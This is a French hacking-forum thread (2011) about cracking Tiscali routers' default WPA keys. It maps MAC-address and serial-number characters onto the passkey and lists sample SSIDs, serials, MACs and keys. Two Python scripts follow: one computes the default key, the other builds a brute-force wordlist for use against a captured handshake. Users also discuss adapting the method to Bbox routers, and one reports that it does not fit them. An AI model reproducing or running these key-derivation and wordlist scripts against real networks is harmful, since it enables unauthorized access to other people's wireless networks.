LE FORUM DU SITE
Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).

Salut à tous,
En me promenant sur les forums d'aircrack, je suis tombé sur le post d'un utilisateur qui dit avoir cracké l'algo de génération de clés WPA tiscali. Il détaille sa méthode, fondée sur le mac et le numéro de série:
Tiscali
--------
SSID SERIAL MAC PASSKEY
Tiscali153BDB -- CLW5034615 -- 00:21:04:15:3B:DB -- B14B03B5B3D6
Tiscali11ECCF -- CLW3074531 -- 00:21:04:11:EC:CF -- F34C0EF1C7C5
1) last of mac ---------------------- 1st in passkey
2) 2nd from last of router serial ---------- 2nd in passkey
3) 6th in on mac -------------------- 3rd in passkey
4) 10th in on mac ------------------- 4th in passkey
5) 5th in mac ----------------------- 5th in passkey
6) 9th in on mac -------------------- 6th in passkey
7) last of mac ---------------------- 7th in passkey
8) 8th of mac ----------------------- 8th in passkey
9) 10th of mac ---------------------- 9th in passkey
10) 5th from last of router serial -------- 10th in passkey
11) 11th of mac -------------------- 11th in passkey
12) 3rd from last of router serial -------- 12th in passkey
Les 6 derniers chiffres/lettres rappellent étrangement les Bbox.
Peut-être y'a-t-il moyen d'adapter cettte méthode et de découvrir l'algo des dernières Bbox? Qu'en pensez-vous?
Dernière modification par superbobo (19-11-2011 15:18:11)
Hors Ligne

Intéressant, mais je doute que ça marche a cause du sérial en LK présent dans les bbox et livebox également... enfin je peux me tromper aussi.Tu peux nous mettre le lien du post? c'est plus sympa d'avoir les sources en plus 
Hors Ligne

Qu'est ce que tu appelles en LK?
Iic, il suffit d'un handshake, et de bruteforcer les 3 lettres/chiffres du serial. Ca serait cool que quelqu'un Bboxnaute nous donne ces infos concernant sa box.
Le lien original: http://forum.aircrack-ng.org/index.php?topic=12161.0
Dernière modification par superbobo (19-11-2011 15:18:25)
Hors Ligne

Le LK c'est le numéro de série sur les nouvelles Bbox qui se forme comme ça LK*****DP******... je viens de vérifier avec 2 bbox ça colle pas, il fallait s'y attendre.
Hors Ligne

Petit script pour tester l'algo empirique :
#!/usr/bin.python2.7
from string import replace
ssid = raw_input("SSID : ")
serial = raw_input("SERIAL : ")
mac = raw_input("MAC : ")
mac = replace(mac,":","")
print "\nWPA default key : "+str(mac[-1])+str(serial[-2])+str(mac[5])+str(mac[9])+str(mac[4])+str(mac[8])+str(mac[-1])+str(mac[7])+str(mac[11])+str(serial[-5])+
str(mac[10])+str(serial[-3])@qolund
Hors Ligne

J'avais pas de bbox sous la main, donc impossible de vérifier. Désolé.
Merci Spawn, ça pourra toujours servir !
Hors Ligne

Et un autre pour créer un dico pour le brute force :
#!/usr/bin.python2.7
import sys
from string import replace
try:
ssid = sys.argv[1]
mac = sys.argv[2]
output = sys.argv[3]
except:
print "Usage : python brutiscali.py SSID MAC output_file_name"
sys.exit()
mac = replace(mac,":","")
fs = ""
for a in range(10):
for b in range(10):
for c in range(10):
fs = fs + str(mac[-1])+str(a)+str(mac[5])+str(mac[9])+str(mac[4])+str(mac[8])+str(mac[-1])+str(mac[7])+str(mac[11])+str(b)+str(mac[10])+str(c)+"\n"
ofi = open(output,'w')
ofi.write(fs)
ofi.close()
print 'done.'@qolund
Hors Ligne

Tu t'amuses bien avec le python 
Hors Ligne

Merci Spawn 
Au passage vous en voyez encore beaucoup vous des box Tiscali? O_o
Hors Ligne

Non pas vraiment... J'ai tout sorte de box dans mon entourage wifi (même un speetouch bordel!), mais pas la moindre box tiscali.
Hors Ligne
| Discussion | Réponses | Vues | Dernier message |
|---|---|---|---|
|
WPSCrackGUI v1.1.1 (Cracking WPA-WPA2 via WPS) par LaConchaDelPato
|
1 | 1204 | 04-03-2012 05:27:10 par kcdtv |
|
Statistiques utilisation WEP/WPA/WPA2 par reallife
|
4 | 375 | 25-01-2012 23:02:23 par M1ck3y |
|
Épinglée : |
55 | 45593 | 17-01-2012 17:54:17 par spawn |
|
Crackage WPA2 Time Capsule par crazy95
|
4 | 771 | 08-01-2012 18:11:19 par kcdtv |
|
Tuto Crackage WPA/WPA2 WPS par michaelvd
|
6 | 2690 | 04-01-2012 02:19:39 par joula |